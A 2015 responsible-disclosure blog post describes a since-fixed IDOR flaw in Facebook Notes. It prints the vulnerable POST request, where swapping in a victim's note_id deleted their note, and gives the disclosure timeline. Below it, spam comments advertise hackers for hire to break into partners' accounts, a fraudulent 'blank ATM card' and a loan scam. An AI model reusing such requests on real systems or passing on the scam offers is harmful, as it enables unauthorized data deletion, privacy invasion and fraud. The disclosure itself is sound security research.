Sunday, 13 December 2015

[Responsible disclosure] How I could have removed all your Facebook notes

Note: This is being published with the permission of Facebook under the responsible disclosure policy. The vulnerability is now fixed.

Summary:

This blog post is about an Insecure direct object reference vulnerability in Facebook Notes using which attacker could have removed all your notes just by replacing his Note id with yours in note editing request. 


About Facebook Notes:

Facebook Notes are ways of writing entries about your life, your thoughts, or your all-time favorite songs and then sharing them with your Facebook friends. The beauty of Notes lies in the ability to blog without needing to distribute a web address to friends so that they can go check out your blog. Instead, your friends are connected to your Profile. Therefore, when you publish a Note, it appears in your News Feed.


Vulnerability description: 

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly, for example database records or files.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.

Reference:  https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References


Vulnerable request:

POST /a/note.php?note_id=[victim’s note id]&publish&gfid=[attacker’s token]
Host: touch.facebook.com

fb_dtsg=[attacker’s token]&charset_test=&title=&body=&privacy=&=Publish&_dyn=&__user=[attacker’s userID]

Replacing note_id in the above request led to successful removal of note from victim's account. Note id can be seen by visiting victim's note and copying the id from the URL.



Video POC:







Impact:

Note deletion from victim's account



Disclosure Timeline:

June 15, 2015 : Report sent to Facebook Security team
June 16, 2015 : Bug acknowledged by Facebook Security team
June 16, 2015 : Vulnerability Fixed
June 22, 2015  : Bounty of $2500 awarded by Facebook






29 comments :

  1. Reading works of white hat hackers really inspire me to work in the field of ethical hacking but how to proceed is the question that blocks my way :(

    ReplyDelete
  2. Interesting and very good post. Reading posts like is really good time spending. I can advise best writing websites page , they are very interesting, and very good written.

    ReplyDelete
  3. We are legitimate and reputable Government registered approved money
    lender, we offer personal loans, business loans, montage loans and all
    kinds of loan to individuals and company's with bad credit record or
    in need of money to pay bills, invest on business, at a very low
    interest rate of 2%. We give out fund between a range of 5,000.00Usd
    to the Maximum range of 50,000.000.00Usd. If you are interested in
    getting a loan, contact us now and fill out the loan application form
    below so that we can send you the loan terms and conditions for
    repayment of the loan.

    Below are the loan Applications:

    FULL NAMES:
    COUNTRY:
    ADDRESS:
    STATE:
    GENDER:
    AGE:
    MARITAL STATUS:
    NEXT OF KIN:
    OCCUPATION:
    MONTHLY INCOME:
    PHONE NUMBER:
    MOBILE PHONE NUMBER:
    AMOUNT NEEDED AS THE LOAN:
    DURATION OF THE LOAN:

    fill the application to the email bellow: diamondloancompany00@gmail.com

    We look forward to hear from you soon.

    Thanks.

    ReplyDelete
  4. Essay topics for high school students a major part of formal education. Essay is a writing document. Essay requires certain format and style for academic tasks. Lack of knowledge for writing an essay and important of assignment and the complexity of the subject are make a difficult situation of the student to complete it.

    ReplyDelete
  5. I guess you must have enough free time to do all those http://customessay-s.com/essay_proofreading.php things. I guess, that hacking is not the quickest thing in the world?

    ReplyDelete
  6. You have made an awareness about Facebook notes and the disclosure policy. The author describes Insecure direct object reference vulnerability in Facebook Notes. His observation and findings help people to understand more about FB notes. Buy research proposal

    ReplyDelete
  7. You have explained about Insecure direct object reference vulnerability in Facebook Notes very clearly. The beauty of Notes lies in the ability to blog without needing to distribute a web address to friends. Best essay writing service

    ReplyDelete
  8. Hello everyone! If you require the service of a professional hacker to help track your partner's cell phone remotely, contact deadlyhacker01@gmail.com, he was excellent in helping me hack my husband's phone without physical contact.
    You can also reach him on
    +1 513-445-5445 , tell him Stacey referred you.

    ReplyDelete
  9. My girlfriend is a big time cheat and I was able to confirm that through the help of secretrevealer04@gmail.com

    I contacted him to help me hack into my girlfriend social media (Facebook,call log,imessage.Gmail and also whatsapp)
    and discovered she was SLEEPING WITH her so called best friend, now I am happy and single and ready to move on thanks to
    secretrevealer04@gmail.com who did the hacking job for me.

    Contact him today for help and tell him John referred you to him..He would be willing to help you

    Please you don't have be worried he is quick and fast and reliable cause they have been tested and trusted.

    ReplyDelete
  10. you shared informative article and i must say that billig sportssko www.skosport.com will be very helpful for lots of people

    ReplyDelete
  11. Your website items set aside everybody once more. I just what food was in ominous desire scarpedesport from a website read through undoubtedly one of a web logs whereby most people advocated some of these. The sole I just stumbled upon at is really solid. Regards!

    ReplyDelete
  12. Welldone! It is an article that is not just helpful for me but lots of many could benefit from it. Allassignmenthelp is a platform which university students can use to get their assignment written by assignment help experts and can get a fabulous assignment paper. Assignment Help online

    ReplyDelete
  13. You have just made it brother Generic Viagra thanking for all your efforts and dedication. Stay Helathy

    ReplyDelete
  14. Hello,
    I was greatly fulfilled to find this site.I expected to thank you for this unprecedented read!! I without a doubt getting a charge out of each and every piece of it and I have you bookmarked to take a gander at new stuff you post.

    Regards,
    Generic Viagra for Men

    ReplyDelete
  15. Very good. you are the winner. Do not forget update new information regularly. thank ! fnaf sister location

    ReplyDelete

  16. Really impressive post. I read it whole and going to share it with my social circules. I enjoyed your article and planning to rewrite it on my own blog.
    run 3

    ReplyDelete
  17. take a view at trackingapps.org/phone-hacking/ to find cool tips and articles on related topics

    ReplyDelete
  18. Winter is the season of love definitely, definitely so. Because the weather does not have to make several of romantic things, telling each other things so sweet as this cold season. Winter that it is easy to fall in love than
    b612 , run 2 game , geometry dash 2.0 apk , snapchat , baixar musicas gratis

    ReplyDelete
  19. I read it whole and going to share it with my social circules. I enjoyed your article and planning to rewrite it on my own blog. Real Delhi Call Girls

    ReplyDelete
  20. My names are Jessica Switch from united states. Merry Christmas in advance friends, become rich today and take the risk of transforming your own life. Try and get a blank ATM card today from (MR TOM HOOPER) and be among the lucky ones who are benefiting from this cards. This PROGRAMMED blank ATM card is capable of hacking into any ATM machine, anywhere in the world. I got to know about this BLANK ATM CARD when I was searching for job online about a month ago.. It has really changed my life for good and now I can say I'm rich because am a living testimony. The least money I get in a day with this card is about $4,000. Every now and then I keeping pumping money into my account. Though is illegal, there is no risk of being caught, because it has been programmed in such a way that it is not traceable, it also has a technique that makes it impossible for the CCTV to detect you.. For details on how to get yours today, E-mail the hackers on ( Tomhooperhackersworld@yahoo.com ) or text him on +1 (914)-517-3229.

    ReplyDelete
  21. This is the idea I need for my research paper writing! I was searching for something like that, essaypro.com reviews
    but it wasn't the thing I need. Thank you very much for this blog and posting

    ReplyDelete
  22. I have visited your website.It is very interesting and impressive.Thanks for sharing with us such a brilliant article.I want to come again.Keep updated.
    Acer Promo codes

    ReplyDelete
  23. Good information that provides enough knowledge to remove notes. I have made official page for my dissertation writing service and publishing notes there from last three years.

    ReplyDelete
  24. Facebook notes are good option when you are essay writing services provider and have to provide information to your clients.

    ReplyDelete
  25. Spot on with this write-up, I truly think this website needs much more consideration. I’ll probably be again to read much more, thanks for that info. obat untuk sakit punggung akibat gagal ginjal

    ReplyDelete
  26. I was amazed by you. the way you create a website very thorough and good. This is very very impressive .
    Techsmith Camtasia coupons

    ReplyDelete